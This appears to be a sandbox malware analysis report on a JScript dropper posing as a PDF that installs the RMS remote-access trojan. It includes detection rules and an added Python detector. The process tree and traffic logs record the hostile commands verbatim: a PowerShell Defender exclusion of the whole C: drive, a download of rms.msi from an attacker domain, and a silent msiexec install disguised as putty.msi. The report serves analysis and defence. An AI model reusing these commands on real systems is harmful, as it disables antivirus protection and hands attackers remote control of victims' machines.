
Windows Analysis Report
U0443.pdf.js

Overview

General Information

Sample name: U0443.pdf.js (renamed because original name is a hash value)
Original sample name: .pdf.js
Analysis ID: 1631720
MD5: 625aad96a4f46cd90d07c3214c1128ed
SHA1: 370b1c58d533b3c895b6c2a5f0b98c61bbe68838
SHA256: 71d764e79cf0b6bcd64360f1dc88364bf445080cf0f6e21923285e323994ce24
Tags: js, user-pr0xylife

Detection

RMSRemoteAdmin
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Parent Double Extension File Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected RMS RemoteAdmin tool
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 8068 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 6308 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 2224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 4952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1828 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 5832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • wscript.exe (PID: 7340 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 3264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 4924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • cmd.exe (PID: 6644 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 2728 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn MD5: E5DA170027542E25EDE42FC54C929077)
    • wscript.exe (PID: 1160 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 3752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • wscript.exe (PID: 1780 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 4128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 7940 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3328 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 2368 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6312 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 85876F97EED0B7EDCFF1192CE7DC76A0 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • rfusclient.exe (PID: 3452 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" -msi_copy "C:\Users\user\AppData\Roaming\putty.msi" MD5: 808E5776D6082C5E319E511D4FA46E4F)
    • rutserv.exe (PID: 6580 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rutserv.exe (PID: 1296 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rutserv.exe (PID: 508 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start MD5: 182AB684EC5C25A535814BC60ECFD87C)
  • rutserv.exe (PID: 1312 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -service MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rutserv.exe (PID: 5760 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rfusclient.exe (PID: 8168 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" MD5: 808E5776D6082C5E319E511D4FA46E4F)
      • rfusclient.exe (PID: 3468 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray MD5: 808E5776D6082C5E319E511D4FA46E4F)
    • rfusclient.exe (PID: 3620 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray MD5: 808E5776D6082C5E319E511D4FA46E4F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | JoeSecurity_RMSRemoteAdmin | Yara detected RMS RemoteAdmin tool | Joe Security
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | MALWARE_Win_RemoteUtilitiesRAT | RemoteUtilitiesRAT RAT payload | ditekSHen
  • 0x334cd4:$s1: rman_message
  • 0x3e62cc:$s3: rms_host_
  • 0x3e6c84:$s3: rms_host_
  • 0x7a9dbc:$s4: rman_av_capture_settings
  • 0x3ed450:$s7: _rms_log.txt
  • 0x452230:$s8: rms_internet_id_settings
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | JoeSecurity_RMSRemoteAdmin | Yara detected RMS RemoteAdmin tool | Joe Security
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | MALWARE_Win_RemoteUtilitiesRAT | RemoteUtilitiesRAT RAT payload | ditekSHen
  • 0x3a610c:$s1: rman_message
  • 0x4751b0:$s3: rms_host_
  • 0x475b68:$s3: rms_host_
  • 0x832b0c:$s4: rman_av_capture_settings
  • 0x87e3fc:$s5: rman_registry_key
  • 0x87e448:$s5: rman_registry_key
  • 0x54b814:$s6: rms_system_information
  • 0x2f9510:$s7: _rms_log.txt
  • 0x50ad08:$s8: rms_internet_id_settings

Source | Rule | Description | Author | Strings
00000027.00000000.2412845653.00000000015F6000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_RMSRemoteAdmin | Yara detected RMS RemoteAdmin tool | Joe Security

Source | Rule | Description | Author | Strings
39.0.rfusclient.exe.bb0000.0.unpack | JoeSecurity_RMSRemoteAdmin | Yara detected RMS RemoteAdmin tool | Joe Security
39.0.rfusclient.exe.bb0000.0.unpack | MALWARE_Win_RemoteUtilitiesRAT | RemoteUtilitiesRAT RAT payload | ditekSHen
  • 0x334cd4:$s1: rman_message
  • 0x3e62cc:$s3: rms_host_
  • 0x3e6c84:$s3: rms_host_
  • 0x7a9dbc:$s4: rman_av_capture_settings
  • 0x3ed450:$s7: _rms_log.txt
  • 0x452230:$s8: rms_internet_id_settings

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6308, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2224, ProcessName: powershell.exe
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 217.21.85.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6308, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49691
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, CommandLine|base64offset|contains: ^^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8068, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ProcessId: 6308, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", ProcessId: 8068, ProcessName: wscript.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 194.180.158.11, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: , Initiated: true, ProcessId: , Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49749
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6308, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2224, ProcessName: powershell.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 217.21.85.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6308, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49691
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", ProcessId: 8068, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6308, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2224, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc, ProcessId: 7940, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T14:49:34.510714+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49691 | 217.21.85.207 | 443 | TCP
2025-03-07T14:49:34.512892+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49692 | 217.21.85.207 | 443 | TCP
2025-03-07T14:49:47.446145+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49703 | 217.21.85.207 | 443 | TCP
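Detection logic for the chain shown in the process tree and the Sigma matches above, written as an added example (not Joe Sandbox's, Sigma's or the rule authors' code). It runs over constructed Sysmon-style records built from the report's own PIDs, command lines and destinations; the field names, the PID credited with the RMS host connections (1312, the rutserv.exe -service instance, since the report leaves Image and ProcessId blank for the 194.180.158.11:8080 connection), the extension lists and the port thresholds are assumptions. It flags the four behaviours that together make this sample malicious rather than a stray remote-admin install: a script host running a double-extension file, that script host spawning PowerShell to add a Defender exclusion, a silent MSI install from a user-writable path, and one process touching several ports on one IP.

```python
"""Detection logic for a wscript -> powershell (Add-MpPreference) -> msiexec /qn
chain plus RMS-style multi-port connections. Added example, not Joe Sandbox or
Sigma code; events are constructed from the report (field names assumed)."""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# "<document ext>.<script ext>" as the last thing before a closing quote or space
DOUBLE_EXT = re.compile(r'\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.(js|jse|vbs|vbe|wsf|hta)"?(\s|$)', re.I)
MP_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)\b", re.I)
QUIET_MSI = re.compile(r"/(qn|quiet|qb)\b", re.I)
COMMON_PORTS = {80, 443}

# Constructed process-creation events (PIDs and command lines taken from the report)
PROC_EVENTS = [
    {"pid": 8068, "ppid": 3084, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js"'},
    {"pid": 6308, "ppid": 8068, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated'},
    {"pid": 2224, "ppid": 6308, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"'''},
    {"pid": 4952, "ppid": 6308, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22'},
    {"pid": 7340, "ppid": 8068, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated'},
    {"pid": 6644, "ppid": 7340, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn'},
    {"pid": 2728, "ppid": 6644, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn'},
]

# Constructed connection events mirroring the report's network section;
# PID 1312 for the RMS host connections is an assumption.
NET_EVENTS = [
    {"pid": 6308, "dst": "217.21.85.207", "port": 443},
    {"pid": 1312, "dst": "194.180.158.11", "port": 8080},
    {"pid": 1312, "dst": "194.180.158.11", "port": 5651},
    {"pid": 1312, "dst": "194.180.158.11", "port": 5655},
    {"pid": 1312, "dst": "194.180.158.11", "port": 80},
    {"pid": 1312, "dst": "5.181.158.121", "port": 5651},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Image basenames up the parent chain; stops at an unknown parent or a cycle."""
    seen, ev = set(), by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield basename(ev["image"])


def detect_process(events):
    """Return (rule, pid) pairs for the three process-level behaviours."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmd"]
        lineage = set(ancestors(e["pid"], by_pid))
        if img in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
            hits.append(("double_extension_script", e["pid"]))
        # The exclusion is tied to a script host in the lineage so admin use of
        # Add-MpPreference from a console is not flagged by this rule.
        if img == "powershell.exe" and MP_EXCLUSION.search(cmd) and lineage & SCRIPT_HOSTS:
            hits.append(("script_host_defender_exclusion", e["pid"]))
        if img == "msiexec.exe" and QUIET_MSI.search(cmd) and re.search(r"\\Users\\", cmd, re.I):
            hits.append(("quiet_msi_from_user_dir", e["pid"]))
    return hits


def detect_network(events, min_ports=3):
    """Flag uncommon destination ports and one process touching >= min_ports ports on one IP."""
    ports = defaultdict(set)
    hits = []
    for e in events:
        ports[(e["pid"], e["dst"])].add(e["port"])
        if e["port"] not in COMMON_PORTS:
            hits.append(("uncommon_dst_port", e["pid"], e["dst"], e["port"]))
    for (pid, dst), seen in sorted(ports.items()):
        if len(seen) >= min_ports:
            hits.append(("multi_port_same_ip", pid, dst, len(seen)))
    return hits


if __name__ == "__main__":
    for hit in detect_process(PROC_EVENTS) + detect_network(NET_EVENTS):
        print(hit)
```

Two caveats for anyone triaging a live host against this report. First, an exclusion of `C:\` covers every path the later stages write to, so confirm and remove it with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` rather than trusting a clean scan. Second, rutserv.exe and rfusclient.exe are the host components of Remote Utilities (RMS), a commercial remote-administration product, so their hashes alone do not prove compromise; it is the delivery chain (a .pdf.js double extension, a Defender exclusion, a silent MSI renamed putty.msi under AppData) that marks this sample as malicious.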


          AV Detection

Source: U0443.pdf.js | Virustotal: Detection: 9%
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB3AE0 rmsEncRsaPublicEncrypt,memcpy | 39_2_6AFB3AE0
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB42D0 rmsEncRsaPrivateEncrypt,memcpy,memcpy,memcpy | 39_2_6AFB42D0
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB38C0 rmsEncDecryptData | 39_2_6AFB38C0
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB4000 rmsEncRsaPublicDecrypt,memcpy,memcpy,memcpy | 39_2_6AFB4000
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB45A0 rmsEncInitSimpleEncryption,memcpy,memcpy | 39_2_6AFB45A0
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB3760 rmsEncEncryptData | 39_2_6AFB3760
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 39_2_6AFB3D30 rmsEncRsaPrivateDecrypt,memcpy,memcpy,memcpy | 39_2_6AFB3D30
Source: https://floatnightlife.com/pdf.pdf?sn=22 | HTTP Parser: No favicon (x2)
Source: file:///C:/Users/user/Downloads/downloaded.pdf | HTTP Parser: No favicon (x2)
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | File created: C:\ProgramData\Remote Manipulator System\install.log
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\licenses.txt
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf
Source: unknown | HTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49691 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49692 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe | File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:

          Software Vulnerabilities

Source: U0443.pdf.js | Argument value: ['"Shell.Application"']
Source: U0443.pdf.js | Argument value: ['"Shell.Application"', '"WScript.Shell"']
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 4x nop then push esi | 39_2_6B376B90
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 4x nop then push esi | 39_2_6B3774B0
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 4x nop then sub esp, 1Ch | 39_2_6B37BEB0
Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | Code function: 4x nop then push esi | 39_2_6B376AD0

          Networking

Source: C:\Windows\System32\wscript.exe | Network Connect: 217.21.85.207 443
Source: global traffic | TCP traffic: 194.180.158.11 ports 5651,8080,0,8,80,5655
Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 194.180.158.11:8080
Source: global traffic | TCP traffic: 192.168.2.5:49731 -> 5.181.158.121:5651
Source: Joe Sandbox View | ASN Name: MIVOCLOUDMD MIVOCLOUDMD
Source: Joe Sandbox View | ASN Name: IPPLANET-ASIL IPPLANET-ASIL
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49692 -> 217.21.85.207:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 217.21.85.207:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49691 -> 217.21.85.207:443
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.14 (x7), 204.79.197.203 (x2), 2.23.227.208 (x1), 150.171.27.254 (x4), 194.180.158.11 (x14), 5.181.158.121 (x22)
Source: global traffic | HTTP traffic detected (seen twice):
  GET /rms.msi?sn=65 HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Language: en-CH
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: floatnightlife.com
Source: global traffic | HTTP traffic detected:
  GET /pdf.pdf?sn=22 HTTP/1.1
  Host: floatnightlife.com
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
